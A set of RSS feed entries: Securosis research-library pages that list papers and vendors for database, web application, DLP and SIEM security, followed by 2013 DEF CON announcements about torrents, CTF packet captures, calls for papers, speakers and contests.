http://securosis.com/feeds/research Stand by for our security management page.

==> Network Security

http://securosis.com/feeds/research Stand by for our network security page.

==> Cloud and Virtualization

http://securosis.com/feeds/research This is one of the newest areas of our coverage, and although cloud computing and virtualization are distinct technologies, they are very closely related.

==> Compliance

http://securosis.com/feeds/research Papers and Posts ------------ This section covers compliance topics and several general security issues related to compliance with industry and governmental regulations. This is a new section for us, and while we have a ton of information on this topic, we will be evolving how we present the material over time. These articles are strategic in nature, but we will be adding videos and podcasts for hands-on guidance in the coming weeks. General Coverage ------------ 1. It Isn’t Risk Management If You Can’t Lose 2. Visa’s Data Field Encryption 3. Tokenization Will Become the Dominant Payment Transaction Architecture 4. Some Follow-Up Questions for Bob Russo, General Manager of the PCI Council 5. We Know How Breaches Happen 6. New Details, and Lessons, on Heartland Breach 7. Heartland Hackers Caught; Answers and Questions 8. An Open Letter to Robert Carr, CEO of Heartland Payment Systems Presentations --------- * Presentation on Tokenization Guidance for PCI. * Presentation on Data Breaches and Encryption. * Presentation on Data Protection in the Enterprise. This is a corporate overview. * Presentation on Encrypting Mobile Data for the Enterprise. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Please email info@securosis.com if you have any additions or corrections.

==> Database Security

http://securosis.com/feeds/research Database Security is one of the broader topics that Securosis covers. Database servers are highly complex systems – storing, organizing, and managing data for a wide array of applications. Most mid-sized firms have dozens of them, some embedded in desktop applications, while others serve core systems such as web commerce, financials, manufacturing, and inventory management. A Fortune 100 company may have thousands. To address the wide range of offerings and uses, we will cover database security from two different angles. The first is the security of the application itself, and the second is the use and security of the data within the database. Database Vulnerability Assessment (VA), access control & user management, and patch management are all areas where preventative security measures can be applied to a database system. For securing the data itself, we include such topics as Database Activity Monitoring (DAM), auditing, data obfuscation/masking, and database encryption. Technologies like database auditing can be used for either, but we include them in the later category because they provide a transactional view of database usage. We also include some of the database programming guidelines that can help protect databases from SQL injection and other attacks against application logic. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and comments). 1. Understanding and Selecting a Database Security Platform is our new comprehensive database security paper. 2. Database Activity Monitoring research paper remains a reader favorite and can be downloaded here: “Understanding and Selecting a Database Activity Monitoring Solution” white paper. 3. 
Understanding and Selecting a Database Assessment Solution is now available. We are very happy with this paper. We have even been told by database assessment vendors their product teams learned some tips from this paper, and we think you will too. 4. Our Understanding and Selecting a Database Encryption or Tokenization Solution paper is available. 5. Database Audit Events is a comprehensive list of database events available through native database auditing techniques. 6. Many supporting posts on Database Encryption: Application vs. Database Encryption and Database Encryption: Fact vs. Fiction, Format and Datatype Preserving Encryption, An Introduction to Database Encryption, Database Encryption Misconceptions, Media encryption options for databases, and threat vectors to consider when encrypting data. 7. The 5 laws of Data Masking. Database Security Patch Coverage
1. Oracle Critical Patch Update, July 2009. General Coverage ------------ 1. SQL Injection Prevention 2. Database Audit Performance in this Friday Summary introduction 3. Database Encryption Benchmarking 4. Three Database Roles: Programmer, DBA, Architect 5. Database Security: The Other First Steps 6. Sentrigo and MS SQL Server Vulnerability. 7. Amazon’s SimpleDB. 8. Information on Weak Database Password Checkers. 9. Database Connections and Trust, and databases are not typically set up to validate incoming connections against SQL injection and misused credentials, and this post on recommending Stored Procedures to address SQL Injection attacks 10. Separation of Duties and Functions through roles and programmatic elements, and putting some of the web application code back into the database. 11. Native database primary key generation to avoid data leakage and inference problems, and additional comments on Inference Attacks. 12. Your Top 5 Database Security Resolutions. 13. Posts on separation of duties: Who “Owns” Database Security, and the follow-up: DBAs should NOT own DAM & Database Security. 14. A look at general threats around using External Database Procedures and variants in relational databases. 15. Database Audit Events. 16. Database Security Mass-Market Update and Friday Summary - May 29, 2009 17. Database Patches, Ad Nauseum 18. Acquisitions and Strategy 19. Comments on Oracle’s Acquisition of Sun 20. Oracle CPU for April 2009 21. Netezza buys Tizor 22. More Configuration and Assessment Options. Discusses recent Oracle and Tenable advancements. 23. Policies and Security Products applies to database security as well as other product lines. 24. Oracle Security Update for January 2009. 25. Responding to the SQL Server Zero Day: Security Advisory 961040 includes some recommendations and workarounds. 26. Will Database Security Vendors Disappear? and Rich’s follow-on Database Security Market Challenges considerations for this market segment. 27. 
Behavioral Monitoring for database security. 28. NitroSecurity acquired RippleTech. 29. Database Monitoring is as big or bigger than DLP. Presentations --------- * Rich’s presentation on Understanding and Selecting a Database Activity Monitoring Solution. (PDF) * Oracle database Security in a Down Economy. (PDF) Podcasts, Webcasts and Multimedia
None at this time Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Database Security Platforms * Application Security Inc. (DBProtect) * Fortinet. * GreenSQL. * IBM (Guardium). * Imperva (SecureSphere) * McAfee (Sentrigo) (Nitro). * Oracle (Secerno). Database Vulnerability Assessment * Application Security Inc.. (AppDetective, DBProtect) * Fortinet. (IPLocks). * IBM (Guardium). * Imperva. (DAS, Scuba) * McAfee. (Sentrigo) * Oracle. (mValent, Config. Packs) * Qualys. * Tenable Network Security. (Nessus) * Next Generation Security Software NGS. (Squirrel) Database Encryption * NetLib. * Oracle. (TDE, API) * Protegrity. * Prime Factors. * Relational Wizards. * RSA. (Valyd) * SafeNet. (Ingrian) * Sybase. * Thales. (aka nCipher) * Trustwave. (Vericept) * Voltage. Note that some of the vendors listed provide transparent disk encryption or application layer encryption that can be applied to database files or content. Database Auditing * GreenSQL * Oracle (Audit Vault). * SoftTree Technologies. (DB Audit Expert) * Quest. (InTrust for DB) Note that all DAM vendors provide auditing to one degree or another. This section is to designate specific products that provide database auditing, are not part of a DAM solution, and are not built into a database platform as a standard component. Database Masking * Axis Technology. * Camouflage. * dataguise. * Embarcadero. * Grid-Tools. * GreenSQL. * Hexaware/Akiva. * IBM. (Optim/Princeton Softech) * Informatica. (ETL + Applimation) * MENTiS Software. * Voltage. 
(ETL + Dynamic) Note that there are several vendors who offer format preserving encryption and tokenization, such as NuBridges, Prime Factors, Protegrity and Voltage, which also provide some masking capabilities. Database Vendors * IBM. * Oracle. (Oracle, MySQL) * Sybase. * Teradata. * Apache. (Derby) * PostgreSQL. (Postgres) * Ingres. (Open Ingres) There are dozens of vendors, both big and small, who offer databases – many with specific competitive advantages. We aren’t even attempting to be comprehensive, and specifically ignored any without widespread mainstream adoption. There are also dozens more open source databases with small numbers of deployments, perhaps primarily embedded in applications or backending non-commercial web applications.

==> Web Application Security

http://securosis.com/feeds/research Here we focus on security specifically for web applications, as opposed to traditional corporate or enterprise applications. Our research pages on general application security should be used in tandem with this one, but this section focuses on the unique issues of web application security. By our definition, Web Application Security is a super-set of traditional application security. Why? Because more often than not, web applications are backed by enterprise applications. They have all of the same problems, along with a handful of new security issues that are specific to offering distributed programs and functions across the Internet. For example, web applications offer features and functions to users outside the corporate network, so they cannot make any assumptions about the security of the network transmission nor the intentions of the user. They run on top of a complex conglomeration of services, consist primarily of custom code, produce dynamic content, and provide their UI entirely through a browser. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). 1. The most important piece of work we’ve published on Web Application Security is Building a Web Application Security Program. For those of you who followed along with the blog series, this is a compilation of that content, but it’s been updated to reflect all the comments we received, with additional research, and the entire report was professionally edited. The original blog series can be found here (Part 1, Part 2, Part 3, Part 4, Part 5, Part 6, Part 7, and Part 8), as well as a couple points we forgot to mention. 2. Rich’s post on How the Cloud Destroys Everything that I Love (About Web App Security). 3. 
The Risks of Trusting Content. 4. Web Application Security: We Need Web Application Firewalls to Work. Better. General Coverage ------------ 1. XML Security Overview 2. It’s Thursday the 13th—Update Adobe Flash Day 3. Heartland Hackers Caught; Answers and Questions 4. Using a Mac? Turn Off Java in Your BrowserWere All Gonna Get Hacked is about the browser, not the app, but we’ll cross reference here. 5. There Are No Trusted Sites: Security Edition 6. Click-jacking Details, Analysis, and Advice. 7. Comments on “Containing Conficker”, a brief analysis of the Honeynet Project’s Know Your Enemy paper, an examination of how the Conficker worm attacks and behaves in general. 8. WAF vs. Secure Code vs. Dead Fish. 9. Adrian’s comments on structured software development security programs and the problems moving from Waterfall to Agile Software Development. Presentations --------- * Our presentation on Building A Web Application Security Program. This was presented as supplementary material to the white paper of the same name. * Presentation on Integrating Penetration Testing Into a Web Application Vulnerability Assessment Program. (PDF) Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Remember that web application security is over and above the standard application security practices and technology, and these should be considered alongside other tools. We strongly encourage you to learn about the specifics of subcategories in the navigation menu. Web Application Assessment * Cenzic * HP * Secure Works * WhiteHat Security Penetration Testing * AppLabs * Bonsai * CGISecurity * Core Security Technologies * McAfee (Foundstone) * Plynt * Rvasi * WindowSecurity.com Static Source Code Review * Aspect Security * Cigital * Fortify * IBM * Ounce * Veracode Dynamic Source Code Review * Coverity * Ounce * Veracode Web Application Firewalls * armorlogic. * ArtofDefense Hyperguard * Barracuda Networks. * Breach. * Cisco. * F5. * Fortify. * Fortinet * Imperva. * Protegrity. Monitoring (All WAF vendors can monitor as well.) Education & Training * SANS Institute * SAIC Most regional ISSA and ISACA chapters can provide assistance as well.

==> Web, Email, and Data Portal Security

http://securosis.com/feeds/research This research page covers web filtering as well as email security and anti-spam options. The email security market, like the web gateway market, is one of the most saturated and commoditized in the security industry. As with firewalls and anti-virus (on Windows), it is essentially impossible to do business without these tools. And to no one’s surprise we see continued convergence of these threat protection products; in some cases, it’s merely mergers and acquisitions to provide two separate products from the same vendor, but in other cases we see combined solutions – often in an attempt to displace point products. As many of the site-managed solutions also offer gateway and secure data exchange services, we will cover that here as well. The intended audience for this page is those interested in security products for their business, to keep their users’ inboxes free of spam, and ensure Internet browsing stays within company policy. In the past we would just have said ‘bleep’, as that is why many of these platforms are purchased. In reality there are many other security and compliance uses for these technologies, which are at least as important. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). 1. Barracuda Networks Acquires Purewire 2. McAfee Acquires MX Logic 3. The Symantec acquisition of MessageLabs demonstrates that the battle for this fully commoditized market is not over. 4. Marshal8e6 Buys Avinti, and how the smaller vendors need to innovate and re-position their technologies to compete. General Coverage ------------ 1. The First Phishing Email I Almost Fell For 2. I Heart Creative Spam 3. Spam Levels and Anti-Spam SaaS. 4. Hackers 1, Marketing 0. 
Presentations --------- PDF versions of presentations (when available) may also be useful, although they don’t include any audio (for any audio/video, please see the next section). Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email if you have any additions or corrections. Vendors * Aladdin * Astaro * Axway (Tumbleweed) * Barracuda Networks * Cisco (Ironport) * Clearswift (MIMESweeper) * Cloudmark * CommTouch * Google (Postini) * Marshal8e6 (Mail Marshal + 8e6 Technologies) * McAfee (IronMail, WebWasher, Secure Computing, CipherTrust) * Proofpoint * SonicWall (MailFrontier) * Symantec (BrightMail and MessageLabs) * WebSense

==> Research: Data Loss Prevention

http://securosis.com/feeds/research We’ve probably written more about Data Loss Prevention than any other single technology. Actually, we prefer to call it Content Monitoring and Protection (CMP), but when we use that only about 3 people know what we’re talking about. We define CMP/DLP as: Products that, based on central policies, identify, monitor, and protect data at rest, in motion, and in use through deep content analysis. We use a pretty narrow definition to keep things clear – CMP/DLP is a defined product category, not some general definition for anything that protects data. Encryption, DRM, portable device control, and all the other things that call themselves DLP can help with data loss, but aren’t DLP. We think using a big bucket like that only confuses people. The best way to tell if something is DLP is to focus on the content awareness/analysis. If it only uses keywords or basic regular expressions, it isn’t really DLP. Now why should you care about DLP? Is it just another over-hyped technology? Nope – we consider it to be one of the most significant security technologies to emerge over the past few years. By adding content and context awareness, we can now protect information based on what it is, as opposed to where it’s stored or some silly label someone slapped on it as metadata. CMP tools are also expanding their understanding of business context, not just the data itself, so we can apply intelligent policies that reflect business processes, while only interfering with said processes when there is a policy violation. CMP helps us find our sensitive information, watch how it’s being used, and then protect it. It’s far from perfect, but it’s still good enough that we recommend it, and we’d use it ourselves if we didn’t just give away all of our stuff for free. We keep all of our Research Library pages updated with our latest research. 
Content is added where it fits best, not in chronological order, so we mark new material with the month/year it was added to help you find changes more easily. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all of the public comments as well). 1. The most important piece of work we’ve published on CMP/DLP is our white paper, Understanding and Selecting a Data Loss Prevention Solution. This report covers all the basics- features, architectures, use cases, and a recommended selection process with testing criteria. It was originally released as a series of blog posts: part 1 (introduction), part 2 (content awareness), part 3 (data-in-motion), part 4 (data-at-rest), part 5 (data-in-use/endpoint), part 6 (central administration), and part 7 (selection process). This is really the place to start if you need to learn about DLP. 2. I also wrote a feature for Information Security Magazine that covers similar material, but is much more condensed. 3. We also released a paper on Best Practices for DLP Content Discovery. This covers all the important issues when using DLP for data at rest. It was also a 6 part series: part 1, part 2, part 3, part 4, part 5, part 6 (use cases). 4. The third paper in our CMP/DLP series is dedicated to Best Practices for Endpoint DLP. As always, available in a series of blog posts: part 1, part 2, part 3, part 4, part 5, part 6 (use cases). 5. An early article on DLP as a feature vs. a full solution: DLP Is A Feature, CMF (Or Whatever We’ll Call It) Is A Solution. 6. A discussion on the evolution of CMP: DLP/ILP/Extrusion Prevention < CMF < CMP < SILM: A Short Evolution of Data Loss Prevention. 7. 
A short piece I did for Network World on DLP, and why it’s worth looking at now. 8. I’m a big proponent of full DLP solutions- this explains why: Data Protection Isn’t A Network Security Or Endpoint Problem. 9. The dirty little secret of DLP. 10. Data protection developments are running along parallel paths – one for productivity applications and communications (CMP/DLP), and the other in the data center (ADMP). Our definitions of DLP and ADMP. 11. Then a post on how those two worlds will connect. 12. A Network World article I wrote on pitfalls of DLP. 13. A look at the differences between DLP, content classification, and e-discovery. 14. You can also use DLP to help prevent malicious outbound connections from sophisticated attackers. 15. In Quick Wins with Data Loss Prevention we cut through the complexity and provide a process for getting immediate value out of your DLP investment, while still setting yourself up for the long term. Presentations --------- Presentation on Understanding and Selecting a Data Loss Prevention System. This is a companion to the DLP White Paper. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Note that many other products include “DLP light” features, such as basic keyword or regex matching. We are only including dedicated DLP solutions here. Full Suite DLP * CA (Orchestria) * Code Green Networks * EMC/RSA (Tablus) * GTB Technologies * McAfee (Reconnex) * Symantec (Vontu) * Vericept * Websense (PortAuthority) * Workshare Network-only tools * Clearswift * Fidelis Security Systems * Palisade Systems * Proofpoint Endpoint-only tools * NextSentry * Trend Micro (Provilla) * Verdasys

==> Application Security

http://securosis.com/feeds/research This section of the research library is dedicated to application security in its many forms. On this page we cover the basic topics, such as Access Control, Monitoring & IDS, SIM, SEM, and Log Management. For other specialized fields within application security, such as web application security and secure software development practices, we provide dedicated subsections. On the navigation bar you will see that we already have a few pages for specific coverage areas. We will continue to fill out our application security offerings, and provide additional specific coverage areas over time. Feel free to make a request if you have something in this area you are interested in seeing. Papers and Posts ------------ * Adrian’s comments on structured software development security programs and the problems moving from Waterfall to Agile Software Development. * How Common Applications Are (Now) the Weakest Link. * Comments on “Containing Conficker” considers some of the challenges most application developers are up against. * Immutable Log technologies help with auditing and event trail verification. * For application security, the implementation and management of a policy set is a key factor in the cost and effectiveness of just about any security product (and, frankly, your happiness as well). * Separation of Duties, Concept of Least Privilege, and other role-based user security measures. * The Perils of the Insider Threat. * PDF Security Pain, and stuff to think about on all script-enabled applications. * A very cool way of reverse engineering applications and content with Visual Forensic Analysis tools. Presentations --------- * Security + Agile = FAIL. Live presentation is here. * This presentation covers Major Enterprise Application Security. Podcasts, Webcasts and Multimedia

==> SIM, SIEM, and Log Management

http://securosis.com/feeds/research This research page covers System Information Management (SIM), System Event Management (SEM), and Log Management technologies. Basically anything that collects events from application and host system log files, or provides analysis and reporting on those events. There will be a few other variants in the type of data collected, where it is collected from, and the speed and depth of analysis performed. As these three areas are morphing into one, we felt it would be best at this time to stop pretending they are “differentiated” things and talk about the common business problems they help customers address. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). 1. 
SIEM, Today and Tomorrow is a look back at some of the evolutionary struggles of SIM/SEM, and what is happening with the market space today. 2. LogLogic Acquires Exaprotect. 3. It seems like every other post we mention SIM/SEM and Log Management. We get a briefing from a vendor nearly every week, and we both know and cover this space. Creating this research page, we realized just how few posts we have written that are dedicated to it. We will provide more in the coming weeks. General Coverage ------------ 1. Policies and Security Products, covering the expense of policy creation and maintenance. Presentations --------- 1. Adrian’s presentation on Meeting Compliance with SIM, SEM and Log Management provides an in-depth discussion of using SIM/SEM and Log Management products for meeting compliance, and offers practical tips in dealing with technical and process challenges. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products we are aware of in this area (including free tools). It does not imply endorsement, and is meant to assist you, should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Vendors ArcSight CA CISCO MARS eIQ ExaProtect IBM Intellitactics LogLogic LogRhythm NetForensics NetIQ NitroSecurity Quest InTrust RSA EnVision Sensage Symantec SSIM Tenable TriGeo Q1 Labs

==> Project Quant

http://securosis.com/feeds/research Project Quant is a special research project to develop a metrics model for measuring the costs and effectiveness of patch management. This page includes the research deliverables associated with the project. All of the draft materials and public feedback are available on the project Blog and Forums: * The Project Quant Blog and Landing Page * The Project Quant Forums Published project documents include: * Version 1.0 of the Project Quant Report * The Project Quant Survey Results Analysis Here are the raw survey results from the project’s Open Patch Management Survey: * Project Quant Raw Survey Results, September 2009. (Zip file includes summary results in Excel format, and full raw results in Excel and CSV formats.) * The survey is still active, and you can participate here.

==> ADMP: Application and Database Monitoring and Protection

http://securosis.com/feeds/research Applications and Database Monitoring and Protection: ADMP. What is it? It’s a different way to think about security for applications. It’s a unified approach to securing applications by examining all of the components at once, viewing security as an operational issue, and getting tools to talk to each other. It means looking at application security in context of the business rules around transaction processing, and not just from a generic network traffic perspective. It is also a bit of prognostication, recommendation, and evangelism on our part, all rolled up into one unified theory. This approach also defocuses from some of the more traditional network and platform security models, and looks at the data and how applications process transactions and data. ADMP is essentially the data center branch of information-centric security, and it combines elements of data and application security into a consistent and specific architecture. The goal is to watch application transactions from the browser through the database, and apply security controls that actually ‘understand’ what’s going on. Our definition is: Products that monitor all activity in a business application and database, identify and audit users and content, and, based on central policies, protect data based on content, context, and/or activity. Papers and Posts ------------ 1. The lead-in to this series of thought is Rich’s posts on The Future Of Application and Database Security, Part 1 and Part 2. 2. Definitions: Content Monitoring and Protection And Application and Database Monitoring and Protection. 3. What is my motivation, or Why Are We Talking About ADMP. 4. ADMP and Assessment: Linking preventative and detective technologies. 5. ADMP: A Policy Driven Example. 6. Web Application Security: We Need Web Application Firewalls to Work. Better. 7. It’s Time To Move Past Vulnerability Scanning To Anti-Exploitation. 
Presentations --------- * Our presentation on Information Centric Data Security and the Data Centric Security Lifecycle. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic.

==> New DEF CON Torrent Page!

https://www.defcon.org/defconrss.xml Have you ever gone to download some of our content, and said to yourself, "I wish there was a torrent of all this..."? Well now there are 20 years' worth, and then some! Check out the new DEF CON Torrent Page, and start sucking down the data in massive chunks to your heart's content! Enjoy!

==> DEF CON in the News - Silent War

https://www.defcon.org/defconrss.xml There's a new article up on the Vanity Fair site called "Silent War", which discusses the history and growing concerns of cyber warfare. It even mentions us here at DEF CON, and one of our long time speakers, Wes Brown. Have yourself a look at: http://www.vanityfair.com/culture/2013/07/new-cyberwar-victims-american-business

==> DEF CON 20 Speaker and Slides Videos + Photos!

https://www.defcon.org/defconrss.xml We have a couple new torrents up we think you may enjoy. At long last the DEF CON 20 Speaker and Slides videos are available as a collection. We also have a collection of photos from DEF CON 20! You can find them at the following links: DEF CON 20 Speaker and Slides Videos (Torrent) DEF CON 20 Pictures (Torrent) Enjoy!

==> More CTF Packets to Peruse!

https://www.defcon.org/defconrss.xml Well, we said we were going to post the DEF CON 18 complete CTF packet captures for your downloading pleasure. We've not only done that, but posted DEF CON 19's CTF pcaps as well! Feast your fancy calculation boxes on all that CTF goodness! You can find these in handy torrent form at the following links: DEF CON 18 CTF Packet Captures (Torrent) DEF CON 19 CTF Packet Captures (Torrent) Enjoy, and keep your eyes peeled for other downloadable goodies later this week!

==> Live Transcription at DEF CON 21!

https://www.defcon.org/defconrss.xml Dark Tangent has signed a contract with a company to transcribe all the speaking tracks as well as the closing ceremony in English. What does this mean? It means for the third time in DEF CON history we will officially be supporting the hearing impaired. This time around it will be with real time transcription appearing on screen, much like what you would see if you had captioning turned on on your TV. We will get cleaned up files after the con for each speech, allowing us to post the presentation text, as well as caption the video files. See DT's original post to see how you may be able to help with this! So with that said, we would hate to go through all the work and expense and only have two security ninjas who are hearing impaired attend. Let's promote this far and wide, and over the next couple years try and include as many as possible. The last time we did translation two years in a row we had two or three people the first, and none the second. Let's see if we can do better this time!

==> DEF CON 21 CFP Has Closed! CTF Quals Around the Corner!

https://www.defcon.org/defconrss.xml Well, the DEF CON 21 Call for Papers has come to a close. As always, we got quite a deluge of new submissions right up to the bell. The review board is hard at work, selecting the finest content for your enjoyment. Submitters should know either way if they have been accepted to speak by June 17th! Let us look forward now, to the Capture the Flag Qualification round, which is just over three weeks away. If you and your friends think you have what it takes to compete at DEF CON, it's time to sign up at 2013.legitbs.net, and good luck!

==> CTF Packet Captures from DEF CON 17!

https://www.defcon.org/defconrss.xml Check this out: We have the complete packet captures from the DEF CON 17 Capture the Flag Competition available to download! DDtek has been kind enough to provide them from their years running CTF, and we'll be releasing the PCaps from DEF CON 18, 19, and 20 in the coming weeks for all of you CTF enthusiasts! Enjoy! Direct Download (~1.25 GB) | Emule Collection | Torrent

==> DEF CON Forums For Contest & Event News

https://www.defcon.org/defconrss.xml Wondering what's to do at DEF CON 21? Check out the DEF CON Forums Official / [Parties / Social Gatherings / Events / Contests] Forum, where there is quite a lot going on of late! For example, you may learn that the DEF CON Short Story contest has just under two weeks left to submit. Project 2 has posted some things you need to know about the contest. Details on the DEF CON Cycle_OverRide have recently been posted. You could browse the latest news on the Unofficial DEF CON Shoot. And hey, if you have something in mind that might be cool at DEF CON 21, discuss it with your peers in the New Ideas section to see if it might get traction! It's all happening now, so give it a look!

==> DEF CON 21 Speaker Page Live!

https://www.defcon.org/defconrss.xml Rejoice! The DEF CON 21 Speaker Page is now live, and you can peruse the first round of poppin fresh talks, listed below! Keep an eye on our Twitter, Facebook, and RSS Feed for all the latest updates!
* MITM All The IPv6 Things, by Scott Behrens & Brent Bandelgar
* Evil DoS Attacks and Strong Defenses, by Sam Bowne & Matthew Prince
* Home Invasion 2.0 - Attacking Network-Controlled Consumer Devices, by Daniel "unicornFurnace" Crowley & Jennifer "savagejen" Savage
* I Can Hear You Now: Traffic Interception and Remote Mobile Phone Cloning with a Compromised CDMA Femtocell, by Doug DePerry & Tom Ritter
* JTAGulator: Assisted Discovery Of On-Chip Debug Interfaces, by Joe Grand aka Kingpin
* The Dirty South Getting Justified with Technology, by David Kennedy & Nick Hitchcock (nick8ch)
* PowerPreter: Post Exploitation Like a Boss, by Nikhil Mitta
* The Road Less Surreptitiously Traveled, by pukingmonkey
* Stalking a City for Fun and Frivolity, by Brendan O'Connor
* De-Anonymizing Alt.Anonymous.Messages, by Tom Ritter
* Bruce Schneier Answers Your Questions, by Bruce Schneier
* Hacking Wireless Networks of the Future: Security in Cognitive Radio Networks, by Hunter Scott
* Predicting Susceptibility to Socialbots on Twitter, by Chris Sumner & Randall Wald

==> DEF CON 21 Call for Parties Updated with FAQ!

https://www.defcon.org/defconrss.xml If you're thinking about throwing a DEF CON 21 party in our pub crawl, we've put together a list of frequently asked questions to clarify what's what in running one! You can also find the submission form if you're ready to take the plunge! There's plenty of room left for your group to make their mark on DEF CON 21, so get those submissions in and make our party row a reality!

==> DC21 CTF Quals Registration is Now Open!

https://www.defcon.org/defconrss.xml In case you haven't heard, as of May 1 you can now register for the DEF CON 21 Capture the Flag qualification round! Get that team together and pop on over to https://legitbs.net/ for all the details and to sign up! The Quals will happen June 15, 2013!

==> The DEF CON 21 Short Story Contest is Underway!

https://www.defcon.org/defconrss.xml The DEF CON 21 Short Story Contest has officially opened! Exercise your wordsmithing talents for the chance to win free admission to DEF CON 21! All of the pertinent details can be found at https://forum.defcon.org/showthread.php?t=13334! Good Luck!

==> The DEF CON 21 Website is Now Live!

https://www.defcon.org/defconrss.xml The DEF CON 21 site is up and running! Check it out for all the latest info on this year's con. Keep checking back for news and developments for DEF CON 21 as they occur! You can also follow us on Twitter, Facebook, or subscribe to our RSS feed!

==> DEF CON 21 Call for DJs/Performers is about to close!

https://www.defcon.org/defconrss.xml If you have long dreamed of the glory of performing live at DEF CON, there's only a few days left in the DEF CON 21 Call for Music/Performers! Check out https://forum.defcon.org/showthread.php?t=13225 if you are interested, and get yourself applied by April 30!

==> DEF CON 21 Awards nominations!

https://www.defcon.org/defconrss.xml Weigh in your picks for the 2013 DEF CON Awards! We are currently accepting nominations for the following categories: 1. Worst coverage of security/hacker related issues by a media person or media outlet (Any Media). 2. Best coverage of security/hacker related issues by a media person or media outlet (Any Media). 3. Best privacy enhancing technology for the last 12 months (Since DEF CON 20). 4. Worst privacy enhancing technology for the last 12 months (Since DEF CON 20). 5. Best security or hacker related Twitter feed. 6. The "Nit-Twit" award for the worst security or hacker related Twitter feed. 7. Best project by an approved DEF CON Group. Include a link to project information. 8. Worst / Most Meaningless security or hacker related buzzword for the last 12 months (Since DEF CON 20). 9. Biggest law enforcement or legal system blunder, related to computer security/hackers. (Since DEF CON 20). 10. The "Security Charlatan of the Year" award. Nominations must be submitted no later than midnight, Las Vegas time, on June 31st, 2013, to be considered for inclusion. Thanks!

==> DEF CON 21 Vendor FAQ is Live!

https://www.defcon.org/defconrss.xml Are you a past DEF CON vendor or interested in peddling your wares at DEF CON 21? The Vendor Area FAQ and Application are now live! Check it out at https://defcon.hackingyour.net/faq!

==> DEF CON 21 Pin Giveaway!

https://www.defcon.org/defconrss.xml Kallahar, a long time DEF CON Goon, has started a project this year to manufacture and give away a free DEF CON 21 pin. Their goal is to raise enough donations to give everyone one for free. Read more about it and see how you can help here: https://forum.defcon.org/showthread.php?t=13309

==> CODAME at DEF CON 21!

https://www.defcon.org/defconrss.xml We're excited to have CODAME this year at DEF CON 21! If you're not familiar, here's what they're all about (from codame.com): Non-profit Festivals & Events covering tech challenges with emphasis on artistic expression and creativity. Bringing together independent artists, coders, game developers, creators, performers and musicians celebrating Art and Technology. CODAME exists to incubate and support artists, technologists and designers that push the boundaries of hardware, software, and physical/digital mediums. At the intersection of ART+TECH, CODAME is accelerating the way we interpret and express our rapidly changing world. They are having a call for artists for this event! Check it out at: http://codame.com/post/46882234348/can-hackers-be-heroes-excited-to-be-bring-codame

==> DEF CON 21 CTF Quals Announced!

https://www.defcon.org/defconrss.xml The DEF CON 21 CTF Quals and schedule have been announced! Check out https://legitbs.net/ for all the details!

==> DEF CON Video Deals at The Source of Knowledge!

https://www.defcon.org/defconrss.xml The Source of Knowledge has some specials on DEF CON 20 Videos and an early bird special for the DEF CON 21 talks! You can check them out at http://tsok.net/defcon21/index.html. Offers good through June 30.

==> The Call For Def Con Capture The Flag Organizers Is Now Complete!

https://www.defcon.org/defconrss.xml On behalf of all the hundreds of staff, volunteers, and community that make DEF CON happen I would like to thank all of the teams, groups, and companies that submitted their vision of how they would run Capture the Flag at DEF CON 21 and beyond. It was very hard for us at DEF CON World Domination HQ to decide on which vision, and ultimately which team, would have the responsibility of seeing the great CTF tradition into the future. With a record number of five well thought out submissions there were many things that went into our final decision from size of team, resources needed, and the look and feel of the contest. Ultimately the following factors weighed heavily:
- Past experience running or participating in high pressure and large scale CTFs
- Past experience of organizers in being respected by the community and having skillz
- A clearly articulated vision for how CTF would evolve under their direction
- A focus on gameplay and describing the scoring system with an eye toward observer education
- Increased transparency
Thank you again to the five teams that did not get selected, we wish you the best of luck and success in your future contests. And now without any further ado we would like to announce the new organizers! Legitimate Business Syndicate http://legitbs.net/

==> Here's Your Big Shot!

https://www.defcon.org/defconrss.xml Many often ask how they can be involved in DEF CON. After all, the thing that makes DEF CON great is the contribution of the community. If you're so inclined, here are a few ways you can get involved with DEF CON 21! HHV Call for Volunteers https://forum.defcon.org/showthread.php?t=13228 DEF CON Call for Music https://forum.defcon.org/showthread.php?t=13225 DC101 wildcard speaking slot https://forum.defcon.org/showthread.php?t=13230 A ton of opportunities just like these will be popping up over the next weeks and months, and a great place to keep watch for them is the DEF CON Forums. Keep your eyes peeled if you're looking for a way to help out!

==> The DEF CON 21 Call for Papers is Open!

https://www.defcon.org/defconrss.xml The time has arrived, friends. The DEF CON 21 Call for Papers is officially open! Get yourselves over to https://www.defcon.org/html/defcon-21/dc-21-cfp.html for the official announcement, and if you choose to submit, good luck!

==> New DEF CON Badge page!

